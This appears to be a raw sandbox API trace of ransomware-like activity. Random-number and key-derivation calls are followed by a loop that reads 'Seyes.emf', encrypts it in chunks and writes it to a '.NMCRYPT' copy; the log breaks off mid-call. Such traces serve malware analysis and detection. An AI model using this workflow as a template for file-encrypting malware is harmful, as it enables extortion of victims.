CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.289] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.289] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.289] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0165.289] CryptHashData (hHash=0x9ad538, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.289] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad138) returned 1 [0165.289] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.289] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.289] wcslen (_String="\\\\?\\") returned 0x4 [0165.289] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0165.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0165.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0165.291] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=37316) returned 1 [0165.291] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0165.291] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.311] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.311] GetLastError () returned 0x0 [0165.311] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.343] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.343] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.343] GetLastError () returned 0x0 [0165.343] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.343] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.343] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.343] GetLastError () returned 0x0 [0165.343] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.343] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.343] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.343] GetLastError () returned 0x0 [0165.343] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.343] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.343] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.343] GetLastError () returned 0x0 [0165.343] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.343] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.343] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.343] GetLastError () returned 0x0 [0165.343] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.344] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.344] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.344] GetLastError () returned 0x0 [0165.344] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.344] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.344] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.344] GetLastError () returned 0x0 [0165.344] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.344] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.344] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.344] GetLastError () returned 0x0 [0165.344] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.344] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, 